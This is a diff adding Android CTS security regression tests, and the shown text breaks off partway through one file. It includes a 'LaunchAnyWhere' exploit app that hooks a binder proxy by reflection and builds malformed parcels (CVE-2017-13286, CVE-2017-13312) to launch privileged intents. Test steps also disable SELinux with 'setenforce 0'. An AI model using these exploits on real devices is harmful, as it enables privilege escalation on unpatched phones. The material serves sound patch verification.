--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_02.java
@@ -24,13 +24,31 @@
/**
* b/68953950
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-02")
public void testPocCVE_2017_13232() throws Exception {
AdbUtils.runCommandLine("logcat -c" , getDevice());
AdbUtils.runPocNoOutput("CVE-2017-13232", getDevice(), 60);
String logcatOutput = AdbUtils.runCommandLine("logcat -d", getDevice());
- assertNotMatchesMultiLine(".*APM_AudioPolicyManager: getOutputForAttr\\(\\) "+
- "invalid attributes: usage=.{1,} content=.{1,} "+
- "flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
+ assertNotMatchesMultiLine("APM_AudioPolicyManager: getOutputForAttr\\(\\) " +
+ "invalid attributes: usage=.{1,15} content=.{1,15} " +
+ "flags=.{1,15} tags=\\[A{256,}\\]", logcatOutput);
}
+
+ /**
+ * b/65853158
+ */
+ @SecurityTest(minPatchLevel = "2018-02")
+ public void testPocCVE_2017_13273() throws Exception {
+ AdbUtils.runCommandLine("dmesg -c" ,getDevice());
+ AdbUtils.runCommandLine("setenforce 0",getDevice());
+ if(containsDriver(getDevice(), "/dev/xt_qtaguid") &&
+ containsDriver(getDevice(), "/proc/net/xt_qtaguid/ctrl")) {
+ AdbUtils.runPoc("CVE-2017-13273", getDevice(), 60);
+ String dmesgOut = AdbUtils.runCommandLine("cat /sys/fs/pstore/console-ramoops",
+ getDevice());
+ assertNotMatchesMultiLine("CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
+ "Kernel panic - not syncing: Fatal exception in interrupt", dmesgOut);
+ }
+ AdbUtils.runCommandLine("setenforce 1",getDevice());
+ }
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
index 6398164..4bf7b80 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_03.java
@@ -23,9 +23,9 @@
/**
* b/71389378
*/
- @SecurityTest
+ @SecurityTest(minPatchLevel = "2018-03")
public void testPocCVE_2017_13253() throws Exception {
String output = AdbUtils.runPoc("CVE-2017-13253", getDevice());
- assertNotMatchesMultiLine(".*OVERFLOW DETECTED.*",output);
+ assertNotMatchesMultiLine("OVERFLOW DETECTED",output);
}
}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
new file mode 100644
index 0000000..02436e7
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_04.java
@@ -0,0 +1,32 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import org.junit.runner.RunWith;
+
+public class Poc18_04 extends SecurityTestCase {
+ /**
+ * b/69683251
+ * Does not require root but must be a hostside test to avoid
+ * a race condition
+ */
+ @SecurityTest(minPatchLevel = "2018-04")
+ public void testPocCVE_2017_13286() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13286", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
new file mode 100644
index 0000000..9364d28
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_05.java
@@ -0,0 +1,41 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_05 extends SecurityTestCase {
+ /**
+ * b/70721937
+ * Does not require root but must be a hostside test to avoid a race
+ * condition
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testPocCVE_2017_13315() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13315", getDevice());
+ }
+
+ /**
+ * b/73085795
+ * Does not require root but must be a hostside test to avoid a race condition
+ */
+ @SecurityTest(minPatchLevel = "2018-05")
+ public void testPocCVE_2017_13312() throws Exception {
+ LaunchSomeWhere.launchSomeWhere("CVE_2017_13312", getDevice());
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
new file mode 100644
index 0000000..9595d5a
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_07.java
@@ -0,0 +1,35 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_07 extends SecurityTestCase {
+
+ /**
+ * b/76221123
+ */
+ @SecurityTest(minPatchLevel = "2018-07")
+ public void testPocCVE_2018_9424() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPoc("CVE-2018-9424", getDevice(), 60);
+ String result = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatchesMultiLine("Fatal signal", result);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
new file mode 100644
index 0000000..0423b37
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_10.java
@@ -0,0 +1,48 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+@SecurityTest
+public class Poc18_10 extends SecurityTestCase {
+
+ /**
+ * b/111641492
+ */
+ @SecurityTest(minPatchLevel = "2018-10")
+ public void testPocCVE_2018_9515() throws Exception {
+ AdbUtils.runCommandLine("rm /sdcard/Android/data/CVE-2018-9515", getDevice());
+ AdbUtils.runCommandLine("mkdir /sdcard/Android/data/CVE-2018-9515", getDevice());
+ AdbUtils.runPocNoOutput("CVE-2018-9515", getDevice(), 300);
+ boolean vulnerableBecauseCrashed = getDevice().waitForDeviceNotAvailable(10_000);
+ if (vulnerableBecauseCrashed) {
+ // wait for device to come online so we can clean up
+ getDevice().waitForDeviceAvailable(120_000); // 2 minutes
+ }
+ AdbUtils.runCommandLine("rm -rf /sdcard/Android/data/CVE-2018-9515", getDevice());
+ }
+
+ /**
+ * b/111274046
+ */
+ @SecurityTest
+ public void testPocCVE_2018_9490() throws Exception {
+ int code = AdbUtils.runPocGetExitStatus("/data/local/tmp/CVE-2018-9490", getDevice(), 60);
+ assertTrue(code != 139); // 128 + signal 11
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
new file mode 100644
index 0000000..9e50e1e
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc18_11.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+
+import static org.junit.Assert.*;
+
+@SecurityTest
+public class Poc18_11 extends SecurityTestCase {
+
+ /**
+ * b/111330641
+ */
+ @SecurityTest(minPatchLevel = "2018-11")
+ public void testPocCVE_2018_9525() throws Exception {
+ assertTrue(AdbUtils.runCommandGetExitCode(
+ "pm dump com.android.settings | grep SliceBroadcastReceiver", getDevice()) != 0);
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java
new file mode 100644
index 0000000..115fad2
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/Poc19_03.java
@@ -0,0 +1,34 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.SecurityTest;
+import static org.junit.Assert.assertFalse;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+@SecurityTest
+public class Poc19_03 extends SecurityTestCase {
+ /**
+ * b/115739809
+ */
+ @SecurityTest(minPatchLevel = "2019-03")
+ public void testPocBug_115739809() throws Exception {
+ assertFalse(AdbUtils.runPocCheckExitCode("Bug-115739809", getDevice(), 30));
+ }
+}
diff --git a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
index cacceaa..eea1380 100644
--- a/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
+++ b/hostsidetests/securitybulletin/src/android/security/cts/SecurityTestCase.java
@@ -23,7 +23,9 @@
import com.android.tradefed.log.LogUtil.CLog;
import java.util.regex.Pattern;
-import com.android.ddmlib.MultiLineReceiver;
+import java.util.regex.Matcher;
+import java.util.Map;
+import java.util.HashMap;
import com.android.ddmlib.Log;
public class SecurityTestCase extends DeviceTestCase {
@@ -31,7 +33,8 @@
private static final String LOG_TAG = "SecurityTestCase";
private long kernelStartTime;
- private static Thread checkOom = null;
+
+ private HostsideOomCatcher oomCatcher = new HostsideOomCatcher(this);
/**
* Waits for device to be online, marks the most recent boottime of the device
@@ -46,11 +49,7 @@
//TODO:(badash@): Watch for other things to track.
// Specifically time when app framework starts
- // Start Out of Memory detection in separate thread
- //if (checkOom == null || !checkOom.isAlive()) {
- // checkOom = new Thread(new OomChecker());
- // checkOom.start();
- //}
+ oomCatcher.start();
}
/**
@@ -94,6 +93,8 @@
*/
@Override
public void tearDown() throws Exception {
+ oomCatcher.stop(getDevice().getSerialNumber());
+
getDevice().waitForDeviceAvailable(120 * 1000);
String uptime = getDevice().executeShellCommand("cat /proc/uptime");
assertTrue("Phone has had a hard reset",
@@ -102,57 +103,37 @@
- kernelStartTime < 2));
//TODO(badash@): add ability to catch runtime restart
getDevice().disableAdbRoot();
+
+ if (oomCatcher.isOomDetected()) {
+ switch (oomCatcher.getOomBehavior()) {
+ case FAIL_AND_LOG:
+ fail("The device ran out of memory.");
+ return;
+ case PASS_AND_LOG:
+ Log.logAndDisplay(Log.LogLevel.INFO, LOG_TAG, "Skipping test.");
+ return;
+ case FAIL_NO_LOG:
+ fail();
+ return;
+ }
+ }
}
public void assertMatches(String pattern, String input) throws Exception {
assertTrue("Pattern not found", Pattern.matches(pattern, input));
}
+ public void assertMatchesMultiLine(String pattern, String input) throws Exception {
+ assertTrue("Pattern not found: " + pattern,
+ Pattern.compile(pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(input).find());
+ }
+
public void assertNotMatches(String pattern, String input) throws Exception {
assertFalse("Pattern found", Pattern.matches(pattern, input));
}
public void assertNotMatchesMultiLine(String pattern, String input) throws Exception {
- assertFalse("Pattern found",
- Pattern.compile(pattern,
- Pattern.DOTALL).matcher(input).matches());
- }
-
- class OomChecker implements Runnable {
-
- @Override
- public void run() {
- MultiLineReceiver rcvr = new MultiLineReceiver() {
- private boolean isCancelled = false;
-
- public void processNewLines(String[] lines) {
- for (String line : lines) {
- if (Pattern.matches(".*lowmemorykiller.*", line)) {
- // low memory detected, reboot device to clear memory and pass test
- isCancelled = true;
- Log.i(LOG_TAG, "lowmemorykiller detected; rebooting device and passing test");
- try {
- getDevice().rebootUntilOnline();
- updateKernelStartTime();
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- return; // we don't need to process remaining lines in the array
- }
- }
- }
-
- public boolean isCancelled() {
- return isCancelled;
- }
- };
-
- try {
- AdbUtils.runCommandLine("logcat -c", getDevice());
- getDevice().executeShellCommand("logcat", rcvr);
- } catch (Exception e) {
- Log.e(LOG_TAG, e.toString());
- }
- }
+ assertFalse("Pattern found: " + pattern,
+ Pattern.compile(pattern, Pattern.DOTALL|Pattern.MULTILINE).matcher(input).find());
}
}
diff --git a/hostsidetests/securitybulletin/test-apps/Android.mk b/hostsidetests/securitybulletin/test-apps/Android.mk
new file mode 100644
index 0000000..f8d63a5
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/Android.mk
@@ -0,0 +1,23 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+# tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+# Build the test APKs using their own makefiles
+include $(call all-makefiles-under,$(LOCAL_PATH))
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk b/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
new file mode 100644
index 0000000..226c360
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/Android.mk
@@ -0,0 +1,34 @@
+#
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+
+LOCAL_MODULE_TAGS := tests
+LOCAL_SDK_VERSION := current
+
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+
+LOCAL_PACKAGE_NAME := CtsHostLaunchAnyWhereApp
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+LOCAL_PROGUARD_ENABLED := disabled
+LOCAL_DEX_PREOPT := false
+
+include $(BUILD_CTS_SUPPORT_PACKAGE)
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml
new file mode 100644
index 0000000..1553c92
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/AndroidManifest.xml
@@ -0,0 +1,44 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+ package="com.android.security.cts.launchanywhere"
+ android:versionCode="1"
+ android:versionName="1.0">
+
+ <application android:label="LaunchAnyWhere Exploitation App">
+ <activity android:name=".StartExploit">
+ <intent-filter>
+ <action android:name="android.intent.action.MAIN" />
+ <category android:name="android.intent.category.LAUNCHER" />
+ </intent-filter>
+ </activity>
+
+ <service android:name=".AuthenticatorService"
+ android:enabled="true"
+ android:exported="true">
+
+ <intent-filter>
+ <action android:name="android.accounts.AccountAuthenticator" />
+ </intent-filter>
+
+ <meta-data
+ android:name="android.accounts.AccountAuthenticator"
+ android:resource="@xml/launchanywhere_authenticator" />
+ </service>
+
+ </application>
+</manifest>
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml b/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
new file mode 100644
index 0000000..bd8643f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/res/xml/launchanywhere_authenticator.xml
@@ -0,0 +1,20 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!-- Copyright (C) 2018 The Android Open Source Project
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
+-->
+
+<account-authenticator
+ xmlns:android="http://schemas.android.com/apk/res/android"
+ android:accountType="com.launchanywhere"
+ />
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java
new file mode 100644
index 0000000..536d9da
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/Authenticator.java
@@ -0,0 +1,180 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.IInterface;
+import android.os.Parcel;
+import android.os.RemoteException;
+
+import java.io.FileDescriptor;
+import java.lang.reflect.Field;
+
+public class Authenticator extends AbstractAccountAuthenticator {
+ static public IGenerateMalformedParcel exploit;
+
+ private int TRANSACTION_onResult;
+ private IBinder mOriginRemote;
+ private IBinder mProxyRemote = new IBinder() {
+ @Override
+ public String getInterfaceDescriptor() throws RemoteException {
+ return null;
+ }
+
+ @Override
+ public boolean pingBinder() {
+ return false;
+ }
+
+ @Override
+ public boolean isBinderAlive() {
+ return false;
+ }
+
+ @Override
+ public IInterface queryLocalInterface(String descriptor) {
+ return null;
+ }
+
+ @Override
+ public void dump(FileDescriptor fd, String[] args) throws RemoteException {}
+
+ @Override
+ public void dumpAsync(FileDescriptor fd, String[] args)
+ throws RemoteException {}
+
+ @Override
+ public boolean transact(int code, Parcel data, Parcel reply, int flags)
+ throws RemoteException {
+ if (code == TRANSACTION_onResult) {
+ data.recycle();
+ Intent payload = new Intent();
+ payload.setAction(Intent.ACTION_REBOOT);
+ data = exploit.generate(payload);
+ }
+
+ mOriginRemote.transact(code, data, reply, flags);
+ return true;
+ }
+
+ @Override
+ public void linkToDeath(DeathRecipient recipient, int flags)
+ throws RemoteException {}
+
+ @Override
+ public boolean unlinkToDeath(DeathRecipient recipient, int flags) {
+ return false;
+ }
+ };
+
+ public Authenticator(Context context) {
+ super(context);
+ }
+
+ @Override
+ public String getAuthTokenLabel(String authTokenType) {
+ return null;
+ }
+
+ @Override
+ public Bundle editProperties(AccountAuthenticatorResponse response,
+ String accountType) {
+ return null;
+ }
+
+ @Override
+ public Bundle getAuthToken(AccountAuthenticatorResponse response,
+ Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle addAccount(AccountAuthenticatorResponse response,
+ String accountType, String authTokenType, String[] requiredFeatures,
+ Bundle options) {
+ try {
+ Field mAccountAuthenticatorResponseField =
+ Class.forName("android.accounts.AccountAuthenticatorResponse")
+ .getDeclaredField("mAccountAuthenticatorResponse");
+
+ mAccountAuthenticatorResponseField.setAccessible(true);
+
+ Object mAccountAuthenticatorResponse =
+ mAccountAuthenticatorResponseField.get(response);
+
+ Class stubClass = null;
+ String responseName = "android.accounts.IAccountAuthenticatorResponse";
+ Class<?>[] classes = Class.forName(responseName).getDeclaredClasses();
+
+ String stubName = responseName + ".Stub";
+ for (Class inner : classes) {
+ if (inner.getCanonicalName().equals(stubName)) {
+ stubClass = inner;
+ break;
+ }
+ }
+
+ Field TRANSACTION_onResultField =
+ stubClass.getDeclaredField("TRANSACTION_onResult");
+ TRANSACTION_onResultField.setAccessible(true);
+ TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null);
+
+ Class proxyClass = null;
+ String proxyName = stubName + ".Proxy";
+ for (Class inner : stubClass.getDeclaredClasses()) {
+ if (inner.getCanonicalName().equals(proxyName)) {
+ proxyClass = inner;
+ break;
+ }
+ }
+
+ Field mRemoteField = proxyClass.getDeclaredField("mRemote");
+ mRemoteField.setAccessible(true);
+ mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse);
+ mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote);
+ } catch (Exception e) {
+ e.printStackTrace();
+ }
+
+ return new Bundle();
+ }
+
+ @Override
+ public Bundle confirmCredentials(
+ AccountAuthenticatorResponse response, Account account, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle updateCredentials(AccountAuthenticatorResponse response,
+ Account account, String authTokenType, Bundle options) {
+ return null;
+ }
+
+ @Override
+ public Bundle hasFeatures(
+ AccountAuthenticatorResponse response, Account account, String[] features)
+ {
+ return null;
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
new file mode 100644
index 0000000..58d75b8
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/AuthenticatorService.java
@@ -0,0 +1,30 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
+
+public class AuthenticatorService extends Service {
+ protected static final String TAG = StartExploit.TAG;
+
+ @Override
+ public IBinder onBind(Intent intent) {
+ return new Authenticator(this).getIBinder();
+ }
+}
\ No newline at end of file
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java
new file mode 100644
index 0000000..752b06d
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13286.java
@@ -0,0 +1,78 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.launchanywhere;
+
+import com.android.security.cts.launchanywhere.IGenerateMalformedParcel;
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13286 implements IGenerateMalformedParcel {
+ @Override
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts." +
+ "IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
+ int bundleStartPos = data.dataPosition();
+ data.writeInt(3);
+
+ data.writeString("launchanywhere");
+ data.writeInt(4);
+ data.writeString("android.hardware.camera2.params.OutputConfiguration");
+ data.writeInt(0);
+ data.writeInt(1);
+ data.writeInt(2);
+ data.writeInt(3);
+ data.writeInt(4);
+ data.writeInt(5);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(13);
+
+ int byteArrayLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ int byteArrayStartPos = data.dataPosition();
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeInt(0);
+ data.writeString(AccountManager.KEY_INTENT);
+ data.writeInt(4);
+ data.writeString("android.content.Intent");
+ intent.writeToParcel(data, 0);
+ int byteArrayEndPos = data.dataPosition();
+ data.setDataPosition(byteArrayLenPos);
+ int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+ data.writeInt(byteArrayLen);
+ data.setDataPosition(byteArrayEndPos);
+
+ int bundleEndPos = data.dataPosition();
+ data.setDataPosition(bundleLenPos);
+ int bundleLen = bundleEndPos - bundleStartPos;
+ data.writeInt(bundleLen);
+ data.setDataPosition(bundleEndPos);
+
+ return data;
+ }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java
new file mode 100644
index 0000000..4678de2
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/launchanywhere/src/com/android/security/cts/launchanywhere/CVE_2017_13312.java
@@ -0,0 +1,76 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package com.android.security.cts.launchanywhere;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Parcel;
+
+public class CVE_2017_13312 implements IGenerateMalformedParcel {
+ public Parcel generate(Intent intent) {
+ Parcel data = Parcel.obtain();
+ data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+ data.writeInt(1);
+ int bundleLenPos = data.dataPosition();
+ data.writeInt(0xffffffff);
+ data.writeInt(0x4C444E42);
